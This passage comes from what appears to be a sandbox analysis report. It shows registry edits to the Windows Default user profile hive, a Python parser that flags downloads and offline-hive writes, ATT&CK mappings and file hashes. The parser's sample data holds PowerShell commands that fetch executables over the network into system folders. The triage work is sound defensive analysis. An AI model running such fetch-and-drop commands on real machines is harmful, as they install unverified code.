Command line: C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel" /v AllItemsIconView /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe (tree depth 3, PID 6912)
    Command line: reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel" /v AllItemsIconView /t REG_DWORD /d 1 /f
    - Modifies data under HKEY_USERS

C:\Windows\system32\cmd.exe (tree depth 2, PID 4556)
Command line: C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes" /v Installtheme /t REG_SZ /d C:\windows\resources\themes\BComp.theme /f
    C:\Windows\system32\reg.exe (tree depth 3, PID 7132)
    Command line: reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes" /v Installtheme /t REG_SZ /d C:\windows\resources\themes\BComp.theme /f
    - Modifies data under HKEY_USERS

C:\Windows\system32\cmd.exe (tree depth 2, PID 5004)
Command line: C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Policies\Microsoft\Windows\Personalization" /v ThemeFile /t REG_SZ /d C:\windows\resources\themes\BComp.theme /f
    C:\Windows\system32\reg.exe (tree depth 3, PID 6304)
    Command line: reg add "HKU\DEFAULT\Software\Policies\Microsoft\Windows\Personalization" /v ThemeFile /t REG_SZ /d C:\windows\resources\themes\BComp.theme /f
    - Modifies data under HKEY_USERS

C:\Windows\system32\cmd.exe (tree depth 2, PID 760)
Command line: C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes" /v CurrentTheme /t REG_SZ /d C:\windows\resources\themes\BComp.theme /f
    C:\Windows\system32\reg.exe (tree depth 3, PID 6944)
    Command line: reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes" /v CurrentTheme /t REG_SZ /d C:\windows\resources\themes\BComp.theme /f
    - Modifies data under HKEY_USERS

C:\Windows\system32\cmd.exe (tree depth 2, PID 972)
Command line: C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v DontUsePowerShellOnWinX /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe (tree depth 3, PID 3808)
    Command line: reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v DontUsePowerShellOnWinX /t REG_DWORD /d 1 /f
    - Modifies data under HKEY_USERS

C:\Windows\system32\cmd.exe (tree depth 2, PID 5312)
Command line: C:\Windows\system32\cmd.exe /c reg unload HKU\Default
    C:\Windows\system32\reg.exe (tree depth 3, PID 7116)
    Command line: reg unload HKU\Default
    - Suspicious use of AdjustPrivilegeToken

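The process tree above is the raw material a responder works from. As an added example that is not part of the tria.ge report, the Python below parses command lines of the three shapes seen here (Invoke-WebRequest downloads, reg load / reg unload of the Default user's NTUSER.DAT, and reg add writes under the hive that was loaded) and turns them into findings. The sample command lines in the block are constructed paraphrases of entries above plus one HTTPS download to a non-system path as a contrast case; example.invalid is a placeholder host. Two points the parser encodes: a -uri with no scheme is fetched over plain http:// by Windows PowerShell's Invoke-WebRequest, so each of the twelve tool downloads above is an unauthenticated plaintext fetch into C:\windows; and a reg add against HKU\DEFAULT issued between a reg load and reg unload of C:\users\default\ntuser.dat edits the template that every future local profile is created from, not the current user's hive.

```python
"""Triage of sandbox process-tree command lines (added example; not part of the tria.ge report).

Pulls three behaviours out of raw command lines like the ones in the process tree above:
  * Invoke-WebRequest downloads (URL, destination, whether the fetch is plaintext HTTP,
    whether the payload lands under the Windows directory),
  * reg load / reg unload of an offline hive (here the Default user's NTUSER.DAT),
  * reg add writes, attributed to the offline hive when they target a key loaded earlier.
"""
from __future__ import annotations

import re
from urllib.parse import urlsplit

# Constructed sample input: paraphrases of entries in the process tree above, plus one
# HTTPS download to a non-system path as a contrast case. Not copied from any real log.
SAMPLE_CMDLINES = [
    r"powershell -command invoke-webrequest -uri matt.b-compservices.com/Tools/PsExec.exe -outfile C:\windows\PsExec.exe",
    r"powershell -command invoke-webrequest -uri https://example.invalid/tool.exe -outfile C:\Users\Public\tool.exe",
    r"C:\Windows\system32\cmd.exe /c reg load HKU\default C:\users\default\ntuser.dat",
    r'reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 0 /f',
    r'reg add "HKU\DEFAULT\Software\Policies\Microsoft\Windows\Personalization" /v ThemeFile /t REG_SZ /d C:\windows\resources\themes\BComp.theme /f',
    r"C:\Windows\system32\cmd.exe /c reg unload HKU\Default",
]

IWR_RE = re.compile(r"(?i)\b(?:invoke-webrequest|iwr)\b(?P<args>.*)$")
REG_RE = re.compile(r'(?i)\breg(?:\.exe)?\s+(load|add|unload)\s+(?:"([^"]+)"|(\S+))(?P<rest>.*)$')
_VALUE = r'''(?:"([^"]*)"|'([^']*)'|(\S+))'''   # quoted or bare argument value


def _opt(args: str, name: str, prefix: str = "-") -> str | None:
    """Return the value following a `-name` (PowerShell) or `/name` (reg.exe) switch."""
    m = re.search(r"(?i)(?<!\S)" + re.escape(prefix) + name + r"\s+" + _VALUE, args)
    return None if m is None else next(g for g in m.groups() if g is not None)


def normalize_uri(raw: str) -> str:
    """Windows PowerShell's Invoke-WebRequest prefixes http:// when the URI has no scheme,
    so a bare host/path in a command line means an unauthenticated plaintext fetch."""
    return raw if "://" in raw else "http://" + raw


def parse_download(cmd: str) -> dict | None:
    m = IWR_RE.search(cmd)
    if m is None:
        return None
    raw_uri, outfile = _opt(m["args"], "uri"), _opt(m["args"], "outfile")
    if raw_uri is None:
        return None
    url = urlsplit(normalize_uri(raw_uri))
    flags = []
    if url.scheme.lower() == "http":
        flags.append("plaintext_http")
    if outfile and re.match(r"(?i)^[a-z]:\\windows\\", outfile):
        flags.append("drops_in_windows_dir")
    return {"host": url.hostname, "url": url.geturl(), "outfile": outfile, "flags": flags}


def parse_reg(cmd: str) -> dict | None:
    m = REG_RE.search(cmd)
    if m is None:
        return None
    rec = {"op": m[1].lower(), "key": m[2] or m[3]}
    rest = m["rest"]
    if rec["op"] == "load":
        rec["file"] = rest.split()[0] if rest.split() else None
    elif rec["op"] == "add":
        rec.update(value=_opt(rest, "v", "/"), type=_opt(rest, "t", "/"), data=_opt(rest, "d", "/"))
    return rec


def triage(cmdlines: list[str]) -> list[tuple]:
    """Walk the command lines in order, tracking which hives are mounted offline."""
    findings: list[tuple] = []
    loaded: dict[str, str | None] = {}            # "hku\default" -> hive file
    for cmd in cmdlines:
        dl = parse_download(cmd)
        if dl is not None:
            findings.append(("download", dl["url"], dl["outfile"], tuple(dl["flags"])))
            continue
        rg = parse_reg(cmd)
        if rg is None:
            continue
        if rg["op"] == "load":
            loaded[rg["key"].lower()] = rg["file"]
            findings.append(("hive_load", rg["key"], rg["file"]))
        elif rg["op"] == "add":
            # First two path components ("HKU\DEFAULT") identify the hive being written.
            hive = "\\".join(rg["key"].split("\\")[:2]).lower()
            target = "offline hive" if hive in loaded else "live hive"
            findings.append(("reg_set", rg["key"], rg["value"], rg["data"], target))
        elif rg["op"] == "unload":
            loaded.pop(rg["key"].lower(), None)
            findings.append(("hive_unload", rg["key"]))
    return findings


def summarize(findings: list[tuple]) -> dict[str, int]:
    counts: dict[str, int] = {}
    for f in findings:
        counts[f[0]] = counts.get(f[0], 0) + 1
    return counts


if __name__ == "__main__":
    for f in triage(SAMPLE_CMDLINES):
        print(f)
```

Run against the real tree, every download comes back flagged plaintext_http and drops_in_windows_dir, and every reg_set lands on the offline hive because it sits between the reg load and reg unload of C:\users\default\ntuser.dat. One caveat when reading the header signature "Modifies visibility of file extensions in Explorer": HideFileExt = 0 shows extensions rather than hiding them; the signature fires on any change to that value.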
MITRE ATT&CK Enterprise v15 (number of matches in parentheses)

Persistence
- Account Manipulation (1)
- Boot or Logon Autostart Execution (1): Winlogon Helper DLL (1)
- Create or Modify System Process (1): Windows Service (1)
- Event Triggered Execution (1): Netsh Helper DLL (1)
- Power Settings (1)

Privilege Escalation
- Account Manipulation (1)
- Boot or Logon Autostart Execution (1): Winlogon Helper DLL (1)
- Create or Modify System Process (1): Windows Service (1)
- Event Triggered Execution (1): Netsh Helper DLL (1)
Downloads (14 files)

- Filesize 2KB
  MD5 d85ba6ff808d9e5444a4b369f5bc2730
  SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
  SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
  SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
- Filesize 1KB
  MD5 cb5a7c84bb571c13878f3f50797f79cb
  SHA1 c42cf59af6b34ba84dbce8eb9d8760563473aa34
  SHA256 9a18c090421b64d07e3fdbc3e61beb26e8e827b8f5cd42cb6a7a3dd08fb3b947
  SHA512 646bbb5968ac16f975d67f630f7b47fe82779b6c9c9a472e1a40df294862fc60adc5d5cc12b01f34839ba1cd6ec15fc983c42a050e879346a4b683f1354b030b
- Filesize 944B
  MD5 a8e8360d573a4ff072dcc6f09d992c88
  SHA1 3446774433ceaf0b400073914facab11b98b6807
  SHA256 bf5e284e8f95122bf75ead61c7e2b40f55c96742b05330b5b1cb7915991df13b
  SHA512 4ee5167643d82082f57c42616007ef9be57f43f9731921bdf7bca611a914724ad94072d3c8f5b130fa54129e5328ccdebf37ba74339c37deb53e79df5cdf0dbe
- Filesize 944B
  MD5 6d3e9c29fe44e90aae6ed30ccf799ca8
  SHA1 c7974ef72264bbdf13a2793ccf1aed11bc565dce
  SHA256 2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d
  SHA512 60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a
- Filesize 1KB
  MD5 c20ac38ae3022e305b8752804aadf486
  SHA1 4c144d6cfafb5c37ab4810ff3c1744df81493cdb
  SHA256 03cba7e903a418a3966af1dc0debfb5fcfb2ac6d372ec48cb1b93c23e0fd1caf
  SHA512 c9def9e5cd09d19b8b47a3f4c61893da715a6ba4b9933c885386d0425ee4ccc30d75eac1097511619d4e6259a46581f803fb38f78a15339391e4e78b0b6153e0
- Filesize 663B
  MD5 a8614a193d22a902e98728b2058ef931
  SHA1 b6cff2d21c7199c435a75eb81925d81e9950a6c2
  SHA256 dc525881a4bde1bdd97d5f86d6d9b7e280433dac86a7cb372561e21567935a14
  SHA512 bdc1c190a230eb04e9e7f5474cf055e2b62fc7c671b1b5bd27f0c55aeffc064e0e48c9428ad85608b2420e12646b4388ff5337826413af1ffc32e9d036418f33
- Filesize 796B
  MD5 7f8b53a986035930ca6cbedf83241248
  SHA1 b922174446409d908e1daed6a06eb919230f92c7
  SHA256 64be5a826411a6be75d1fb63a60c8e38634a31f4a8e3c6914ccc8dd1c9b7777c
  SHA512 46c32bf34e1d06caade3357591bd62e7e707f1d26b0b8f4da18c8e1d2f84459e4467b70d24c93fb06a31800167101dd31c44c320d94f251dd1131e0598d13cc5
- Filesize 1KB
  MD5 055cd1930e45c3d77aa744d53bcc29d9
  SHA1 af1464daf329f36930b71fb33119c61a13472b6d
  SHA256 fcd4a469c653f6bd319b201326633c2183a70184bc159c071915a9c4abd92d3c
  SHA512 00ee038f281f34c7d727b7d6d7734bdfc61ee742b33edc5f905adae6afa949b9a9da8c575d949e98b24b59005e469628e99f113e0fc612dc24bbba7f098fa65d
- Filesize 1KB
  MD5 98ca3263bd17f6f4308b8e4ff7530958
  SHA1 6f41bacd42af6a11bb8d1516f7b07171087e7a17
  SHA256 d25dfa289ae0981cb5c6da04de6c9f1a4aaf51ba8eafb7aeda3c9e5a27268e19
  SHA512 f2ad36f84956741c2e3ef494a36f2a96bf944ab035419e82447bb25a53b309a9e93b450d679cb5709f6acb5a2b7956c568b280151b65313637f758ffd08f01e7
- Filesize 1KB
  MD5 08f9f3eb63ff567d1ee2a25e9bbf18f0
  SHA1 6bf06056d1bb14c183490caf950e29ac9d73643a
  SHA256 82147660dc8d3259f87906470e055ae572c1681201f74989b08789298511e5f0
  SHA512 425a4a8babbc11664d9bac3232b42c45ce8430b3f0b2ae3d9c8e12ad665cd4b4cbae98280084ee77cf463b852309d02ca43e5742a46c842c6b00431fc047d512
- Filesize 1KB
  MD5 ba7bb8c22d72f7d6094bf4b7a11fd2df
  SHA1 e68eab39081c17997a16bca1667f1544f11804a5
  SHA256 0b479a9a243e4fa548d64277229f3c72cc7c6773001a235fc406c74e98d32b1a
  SHA512 58288cb73c35eb08b28f9ad0e96ed17e89b6e361c015c233deba9eb39a928e7216576c897bed531625171606ff9952361c40b14df27c0aa7e2e68228aeb0de4c
- Filesize 1KB
  MD5 b6b62fabc50bfae977635bcebb14c566
  SHA1 653628f0db5229d9136ee897e92bedba3b1d91aa
  SHA256 bd5e81d2c243ab6465ad978a5124f723b6518c08d63e4ebb386a564ebf3384be
  SHA512 9bbbbdd9b0571e55065751e2100b21685ef630641bedf53e6a1c8b3ec96606c378ec53d732500e7dc17ae6e3a1b4d37f2fdbec8e493f6bdf10e4b829dad5962f
- Filesize 400B
  MD5 2395435030954e996dda30cc02daebdd
  SHA1 6d4493185988373c6dc2411fea8bad6c9648fd4a
  SHA256 43e896907237944324de346cbc605dbc508f7a2c107c7f888f919e2d5cd046bc
  SHA512 f20d578d95805ef321a32230d6b249db0dd9261f4937e4dcf9706430d55d1b4088aa7fc9cc9878932b3f7a99b8afac30368c6002e348a1d1a25b4375572044fb
- Filesize 60B
  MD5 d17fe0a3f47be24a6453e9ef58c94641
  SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82